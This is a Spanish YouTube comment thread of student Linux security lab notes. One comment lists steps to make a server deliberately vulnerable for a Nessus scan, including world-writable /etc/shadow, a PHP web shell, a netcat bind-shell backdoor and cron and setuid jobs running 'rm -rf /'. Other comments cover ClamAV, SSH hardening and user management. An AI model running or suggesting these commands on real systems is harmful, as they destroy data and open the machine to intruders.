**1- Instalar OpenSCAP en un servidor Linux de su preferencia.** sudo yum update -y sudo yum install -y scap-security-guide openscap-scanner scap-workbench scap-workbench 3- Realizar un escaneo de vulnerabilidades al equipo cliente utilizando Nessus, sino hay vulnerabilidades deben provocarlas. nano /etc/ssh/sshd_config Protocol 1 PermitRootLogin yes # Permitir inicio de sesión como root PasswordAuthentication yes # Habilita la autenticación por contraseña PermitEmptyPasswords yes # Permitir contraseñas vacías PubkeyAuthentication no # Desactiva la autenticación por clave pública ClientAliveInterval 0 # Desactiva el cierre de sesiones inactivas MaxSessions 10 # Permite más sesiones simultáneas sudo systemctl restart sshd nano /etc/security/pwquality.conf minlen = 5 # Mínimo de 8 caracteres minclass = 0 # Requiere mayúsculas, minúsculas, números y símbolos (cada clase representa un tipo) dcredit = 0 # Exige al menos un dígito ucredit = 0 # Exige al menos una letra mayúscula lcredit = 0 # Exige al menos una letra minúscula sudo nano /etc/pam.d/system-auth Desactivar la verificación de contraseñas seguras # password requisite pam_pwquality.so try_first_pass local_users_only retry=3 authtok_type= Desactivar el uso de contraseñas fuertes # password requisite pam_cracklib.so try_first_pass retry=3 type= - Establecer permisos incorrectos en archivos críticos sudo chmod 777 /etc/passwd sudo chmod 777 /etc/shadow - Habilitar protocolos inseguros en SSH sudo sed -i 's/^#Protocol 2/Protocol 1/' /etc/ssh/sshd_config sudo systemctl restart sshd - Ejecutar procesos con permisos elevados sin necesidad echo -e "#!/bin/bash rm -rf / --no-preserve-root" > /tmp/insecure_script.sh chmod +s /tmp/insecure_script.sh - Exponer credenciales en texto plano echo "username=admin" | sudo tee /var/credentials.txt sudo chmod 777 /var/credentials.txt - Agregar un script de crontab malicioso echo "* * * * * root rm -rf /" | sudo tee -a /etc/crontab **SERVICIOS IMPORTANTES** sudo yum install httpd -y sudo systemctl start httpd sudo systemctl enable httpd sudo echo '<Directory "/var/www/html"> AllowOverride All Require all granted </Directory>' >> /etc/httpd/conf/httpd.conf sudo systemctl restart httpd - Incluir un archivo malicioso en el servidor web: echo "<?php system('id'); ?>" | sudo tee /var/www/html/malicious.php sudo chmod 777 /var/www/html/malicious.php - Habilitar servicios de telnet: sudo yum install telnet-server -y sudo systemctl start telnet.socket sudo systemctl enable telnet.socket - Habilitar servicios de vsftpd: sudo yum install vsftpd -y sudo systemctl start vsftpd sudo systemctl enable vsftpd sudo sed -i 's/^#anonymous_enable=NO/anonymous_enable=YES/' /etc/vsftpd/vsftpd.conf sudo systemctl restart vsftpd - Dejar un puerto abierto con un servicio vulnerable: sudo yum install nc -y echo -e "#!/bin/bash while :; do nc -lvp 9999 -e /bin/bash; done" > /tmp/backdoor.sh chmod +x /tmp/backdoor.sh sudo /tmp/backdoor.sh & -Crear reglas de firewall extremadamente permisivas: sudo firewall-cmd --add-port=1-65535/tcp --permanent sudo firewall-cmd --reload - Activar SNMP con configuración predeterminada (puerto 161): sudo yum install net-snmp-utils net-snmp -y sudo sudo sed -i 's|^com2sec notConfigUser default public|com2sec notConfigUser 0.0.0.0/0 public|' /etc/snmp/snmpd.conf sudo systemctl restart snmpd sudo firewall-cmd --add-port=161/udp --permanent sudo firewall-cmd --reload - Exponer el puerto MySQL (puerto 3306): sudo yum install mariadb-server -y sudo systemctl start mariadb sudo systemctl enable mariadb sudo firewall-cmd --reload sudo sed -i '/\[mysqld\]/a bind-address=0.0.0.0' /etc/my.cnf sudo systemctl restart mariadb - Habilitar Samba sin restricciones (puertos 137-139, 445): sudo yum install samba -y sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak sudo cat > /etc/samba/smb.conf <<EOL [global] workgroup = WORKGROUP security = user map to guest = Bad User [shared] path = /srv/samba/shared browsable = yes writable = yes guest ok = yes EOL sudo mkdir -p /srv/samba/shared sudo chmod -R 777 /srv/samba/shared sudo systemctl start smb sudo systemctl enable smb sudo firewall-cmd --add-port=137-139/tcp --permanent sudo firewall-cmd --add-port=445/tcp --permanent sudo firewall-cmd --reload - Habilitar un servidor DNS vulnerable (puerto 53): sudo yum install bind bind-utils -y sudo systemctl start named sudo systemctl enable named sudo firewall-cmd --add-port=53/udp --permanent sudo firewall-cmd --add-port=53/tcp --permanent sudo firewall-cmd --reload - Exponer NFS (puerto 2049): sudo yum install nfs-utils -y sudo mkdir -p /var/nfs sudo chmod 777 /var/nfs echo "/var/nfs *(rw,sync,no_root_squash)" | sudo tee -a /etc/exports sudo systemctl start nfs-server sudo systemctl enable nfs-server sudo firewall-cmd --add-port=2049/tcp --permanent sudo firewall-cmd --reload
@percypaniagua8307Ай бұрын
bro que pasa si no tengo la contraseñas de acceso que tu pusiste
@yuditvelasquezmatias9769Ай бұрын
felicidades compañero, estoy muy orgullosa de ti 🥳🥳
@alexneraquinoheredia3588Ай бұрын
@@yuditvelasquezmatias9769 gracias, bendiciones
@alexneraquinoheredia3588Ай бұрын
Ahora si terminamos el cuatrimestre :)
@FidelReymtАй бұрын
felicidades brooo 🥳🥳
@abieljaphetgarciavasquez4155Ай бұрын
la cabra!!!!!!!!!!💪💪💪💪
@felixarielbereguetepaula2260Ай бұрын
que pupu de video papa dislike
@alexneraquinoheredia35882 ай бұрын
Todo se resume en: básicamente
@miguelangel262992 ай бұрын
🔥🔥🔥
@FidelReymt2 ай бұрын
hola bro, algun dia podras enseñar hacking con alguna distribucion de linux ya sea parrot o kali, gracias :)
@alexneraquinoheredia35882 ай бұрын
Una cosa, el script en el video, en la tercera linea, específicamente la parte donde dice "clamscan" la ultima variable, la de **--log=$LOG_FILE**, esta mal escrito en el video, tiene dos comillas, lógicamente me funciono porque lo cambie detrás de cámara pero lo digo aquí porque ahora fue que me acorde y no lo mencione en el video.
@alexneraquinoheredia35882 ай бұрын
*************Implementar ClamAV************* - sudo apt update - sudo apt install clamav clamav-daemon -y ***Actualizar base de datos de virus de ClamAV**** Para actualizar ClamAV primero debemos detener el servicio clamav-freshclam - sudo systemctl stop clamav-freshclam Ahora actualizaremos la base de datos de virus de ClamAV - sudo freshclam iniciaremos el servicio clamav-freshclam para que continue actualizando la base de datos ClamAV en segundo plano siempre que sea necesario. - sudo systemctl start clamav-freshclam - sudo systemctl enable clamav-freshclam ************* 1- Configurar las actualizaciones automáticas ************* - sudo nano /etc/clamav/freshclam.conf **Actualizar 24 veces al día** Checks 24 Esto hará que freshclam verifique actualizaciones cada hora - sudo systemctl restart clamav-freshclam ****2- Configurar los escaneos periódicos**** **Crea un script para realizar el escaneo:** - sudo nano /usr/local/bin/clamav-scan.sh **script** #!/bin/bash LOG_FILE="/var/log/clamav/scan-$(date +%F).log" DIR_TO_SCAN="/home/alexner1515/Documents" clamscan -r $DIR_TO_SCAN --log=$LOG_FILE **Hazlo ejecutable** - sudo chmod +x /usr/local/bin/clamav-scan.sh **Crontab** - sudo crontab -e 0 3 * * * /usr/local/bin/clamav-scan.sh **Verificar crontab** sudo crontab -l **Hacerlo en tiempo real** ***el comando se ejecuta después de que haya prueba*** sudo tail -f /var/log/clamav/scan-$(date +%F).log **Este archivo no es un virus real, sino una cadena de texto diseñada para ser detectada por los motores antivirus como si fuera un archivo malicioso.** echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > ~/eicar-test-file.txt -ls ~/eicar-test-file.txt ****3- Mostrar los logs generados por ClamAV**** - sudo cat /var/log/clamav/freshclam.log
@alexneraquinoheredia35882 ай бұрын
Que no se note lo mal editado que está el vídeo
@angelgaux2 ай бұрын
El tipo pasando trabajo a las 2 de la mañana
@alexneraquinoheredia35882 ай бұрын
@@angelgaux pero
@NETFREE20262 ай бұрын
Y ESTA MIERDA PARA QUE SIRVE
@miguelangel262992 ай бұрын
Prendío en fuego el loco
@alexneraquinoheredia35882 ай бұрын
@@miguelangel26299 me tan prendiendo a mí
@bladimirdiaz53332 ай бұрын
El mejor
@alexneraquinoheredia35882 ай бұрын
El 10 de diciembre se acaba el cuatrimestre
@miguelangel262992 ай бұрын
😌😌
@alexneraquinoheredia35882 ай бұрын
1- Deshabilitar el acceso de root por medio de SSH sudo nano /etc/ssh/sshd_config PermitRootLogin yes PermitRootLogin no sudo systemctl restart ssh 2- Configurar timeout para SSH en 5 minutos de inactividad sudo nano /etc/ssh/sshd_config ClientAliveInterval 300 ClientAliveCountMax 0 ClientAliveInterval 300 establece que, después de 300 segundos (5 minutos), el servidor enviará un mensaje al cliente. ClientAliveCountMax 0 define que, si el cliente no responde al primer mensaje, se cerrará la conexión. sudo systemctl restart ssh 3- Editar la política de contraseña local para que cada contraseña establecida requiera los siguientes parámetros: o Mínimo 8 caracteres o Una letra mayúscula o Una letra minúscula o Un símbolo o Un número i l sudo nano /etc/security/pwquality.conf minlen = 8 # Mínimo de 8 caracteres minclass = 4 # Requiere mayúsculas, minúsculas, números y símbolos (cada clase representa un tipo) dcredit = -1 # Exige al menos un dígito ucredit = -1 # Exige al menos una letra mayúscula lcredit = -1 # Exige al menos una letra minúscula ocredit = -1 # Exige al menos un símbolo 4- Las contraseñas locales deben expirar cada 90 días. sudo nano /etc/login.defs PASS_MAX_DAYS 90 Configurar expiración para usuarios existentes: sudo chage -M 90 nombre_usuario Verificar la configuración de expiración para un usuario: sudo chage -l nombre_usuario 5- Configurar el firewall para permitir solo SSH y paquetes ICMP, el resto debe estar bloqueado. Limpia las reglas existentes sudo iptables -F -F: Elimina todas las reglas existentes en las cadenas seleccionadas Ver las nuevas reglas sudo iptables -L -v -L: Muestra las reglas actuales de las cadenas en iptables o lista. -v: Muestra el resultado o verbose. Establece la política predeterminada para bloquear todo el tráfico: sudo iptables -P INPUT DROP sudo iptables -P FORWARD DROP sudo iptables -P OUTPUT ACCEPT Permitir el tráfico SSH entrante y saliente: sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT sudo iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT Permitir paquetes ICMP: sudo iptables -A INPUT -p icmp -j ACCEPT sudo iptables -A OUTPUT -p icmp -j ACCEPT Permitir tráfico de loopback: sudo iptables -A INPUT -i lo -j ACCEPT sudo iptables -A OUTPUT -o lo -j ACCEPT ver las nuevas reglas: sudo iptables -L -v
@alexneraquinoheredia35882 ай бұрын
1- Crear 6 usuarios de su preferencia siguiendo la nomenclatura de la práctica 1 (primera letra del nombre + apellido). sudo adduser jdoe sudo adduser asmith sudo adduser bwhite sudo adduser cmiller sudo adduser ddavis sudo adduser ejohnson 2- Crear un grupo llamado “estudiantes” y otro grupo llamado “prueba”. Añadir los usuarios creados a ambos grupos. sudo groupadd estudiantes && groupadd prueba sudo usermod -aG estudiantes,prueba jdoe sudo usermod -aG estudiantes,prueba asmith sudo usermod -aG estudiantes,prueba bwhite sudo usermod -aG estudiantes,prueba cmiller sudo usermod -aG estudiantes,prueba ddavis sudo usermod -aG estudiantes,prueba ejohnson ver usuarios del grupo: grep docentes /etc/group 3- Crear un nuevo usuario llamado “profesor” y un nuevo grupo llamado “docentes”. sudo adduser profesor && groupadd docentes 4- Debe habilitar los privilegios para ejecutar el comando sudo tanto para el usuario “profesor” como para el grupo “docentes” editando el archivo /etc/sudoers (Nota: debe añadir dos entradas, una habilitando los permisos de sudo al usuario y otra para cada miembro del grupo). sudo visudo profesor ALL=(ALL) ALL %docentes ALL=(ALL) ALL comprobar: su - profesor sudo whoami 5- Debe retirar los usuarios del grupo prueba y eliminar el grupo. sudo deluser usuario prueba sudo groupdel prueba comprobar: cat /etc/group grep prueba /etc/group 6- Debe eliminar uno de los 6 usuarios creados sudo userdel jdoe 7- Debe añadir uno de los 5 usuarios restantes al grupo docentes tras listar dicho grupo en el archivo “sudoers” y verificar si este usuario obtuvo los privilegios de ejecutar sudo tras pertenecer al grupo. sudo usermod -aG docentes asmith sudo visudo su - asmith 8- Editar la política de contraseña local para que cada contraseña establecida requiera los siguientes parámetros: o Mínimo 8 caracteres o Una letra mayúscula o Una letra minúscula o Un símbolo o Un número sudo apt update sudo apt install libpam-pwquality # here are the per-package modules (the "Primary" block) password required pam_pwquality.so retry=3 minlen=8 ucredit=-1 lcredit=-1 dcredit=-1 ocredit=-1 Aquí, las opciones son: minlen=8: Mínimo de 8 caracteres. ucredit=-1: Al menos una letra mayúscula. lcredit=-1: Al menos una letra minúscula. dcredit=-1: Al menos un dígito. ocredit=-1: Al menos un símbolo. passwd nombre_usuario 9- La contraseña de los usuarios debe expirar cada 90 días. sudo nano /etc/login.defs PASS_MAX_DAYS 90 Configurar expiración para usuarios existentes: sudo chage -M 90 nombre_usuario Verificar la configuración de expiración para un usuario: sudo chage -l nombre_usuario 10- Debe cambiar la contraseña de los usuarios creados anteriormente. sudo passwd asmith sudo passwd bjones sudo passwd clark
@alexneraquinoheredia35882 ай бұрын
import-module admpwd.ps -verbose update-admpwdadschema set-admpwdcomputerselfpermission -identify "Nombre de carpeta" set-admpwdreadpasswordpermission -orgunit "Nombre de carpeta" -allowedprincipals administrador get-admpwdpassword -computername "Nombre del equipo"
@errorhumano26392 ай бұрын
god , mejor que tryhackme
@Xunersito2 ай бұрын
eres un duro
@Jhironsel2 ай бұрын
Muchacho... sudo apt upgrade para actualizar...
@alexneraquinoheredia35882 ай бұрын
@@Jhironsel a
@keyberhernandez69393 ай бұрын
el gueso que video ma largo guao Dio mio
@alexneraquinoheredia35883 ай бұрын
@@keyberhernandez6939 ni cuánta prueba
@abieljaphetgarciavasquez41553 ай бұрын
el mejor!!!!!!!!!!!!!!! yo quede ''ya se acabo esta vaina'', ''estaba facil'' y ''que mas vamos a decir'' 😂😂😂😂
@alexneraquinoheredia35883 ай бұрын
@@abieljaphetgarciavasquez4155 azaroso
@felixcaba9423 ай бұрын
El guesaso
@arturogarcia29613 ай бұрын
El loco mío fundiendo
@alexneraquinoheredia35883 ай бұрын
Es un proceso
@cristhofersantos42003 ай бұрын
El maestro en esto 🔥🔥
@janjarlin3 ай бұрын
Duro cómo siempre, se nota el amor y esfuerzo
@alexneraquinoheredia35883 ай бұрын
a
@alexneraquinoheredia35883 ай бұрын
gracia bro
@henrytaveras55983 ай бұрын
el mejor🔥🔥🔥
@keyberhernandez69393 ай бұрын
depue de adrian se quieren volver youtuber guao Dios mio, Nunca para